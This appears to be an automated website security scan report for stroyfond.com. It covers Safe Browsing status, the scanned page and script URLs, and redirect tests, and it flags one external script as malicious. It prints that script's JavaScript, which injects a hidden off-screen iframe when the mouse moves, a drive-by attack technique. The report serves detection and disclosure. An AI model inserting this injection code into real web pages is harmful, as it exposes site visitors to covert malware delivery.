Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stroyfond.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.stroyfond.com/ | 200 OK Content-Length: 14897 Content-Type: text/html | clean |
http://www.stroyfond.com/bitrix/templates/sm_base/js/jquery.js | 200 OK Content-Length: 91556 Content-Type: application/javascript | clean |
http://www.stroyfond.com/bitrix/templates/sm_base/js/jquery.lightbox-0.5.pack.js | 200 OK Content-Length: 6267 Content-Type: application/javascript | clean |
http://www.stroyfond.com/bitrix/templates/sm_base/js/script.js | 200 OK Content-Length: 20 Content-Type: application/javascript | clean |
http://www.stroyfond.com/bitrix/js/main/core/core.js?1359292002 | 200 OK Content-Length: 71520 Content-Type: application/javascript | clean |
http://www.stroyfond.com/bitrix/js/main/core/core_ajax.js?1359292002 | 200 OK Content-Length: 26744 Content-Type: application/javascript | clean |
http://www.stroyfond.com/bitrix/js/main/session.js?1348124300 | 200 OK Content-Length: 3157 Content-Type: application/javascript | clean |
http://fotaz.16mb.com/3fyCt8YG.php?id=244956 | HTTP/1.1 404 Not Found Connection: close Date: Wed, 10 Sep 2014 11:20:40 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://www.hostinger.lt/klaida_404? | 200 OK Content-Length: 10696 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.6.2/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: text/javascript | clean |
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.14/jquery-ui.min.js | 200 OK Content-Length: 201658 Content-Type: text/javascript | clean |
http://fotaz.16mb.com/js/site.php | HTTP/1.1 404 Not Found Connection: close Date: Wed, 10 Sep 2014 11:20:42 GMT Server: Apache Content-Length: 170 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.2.17 | clean |
http://www.hostinger.lt/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
http://changeip.changeip.name/rsize.js | 200 OK Content-Length: 405 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) res='ÐÑибка MySQL'; var astatf = 0; document.write("<head></head><b><div id='staticaccoin'></div></b>"); document.onmousemove=moveonlinetest; function moveonlinetest() { if (astatf == 0) { astatf++; text = "<iframe src='"+res+"' width='10' height='16' style='position: absolute; z-index: 1; left: -1000px; top: -1000px;'></iframe>"; document.getElementById("staticaccoin").innerHTML = text }} Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stroyfond.com
Result:
GET / HTTP/1.1
Host: stroyfond.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: stroyfond.com
Referer: http://www.google.com/search?q=stroyfond.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: stroyfond.com
Referer: http://www.google.com/search?q=stroyfond.com
Result:
The result is similar to the first query. There are no suspicious redirects found.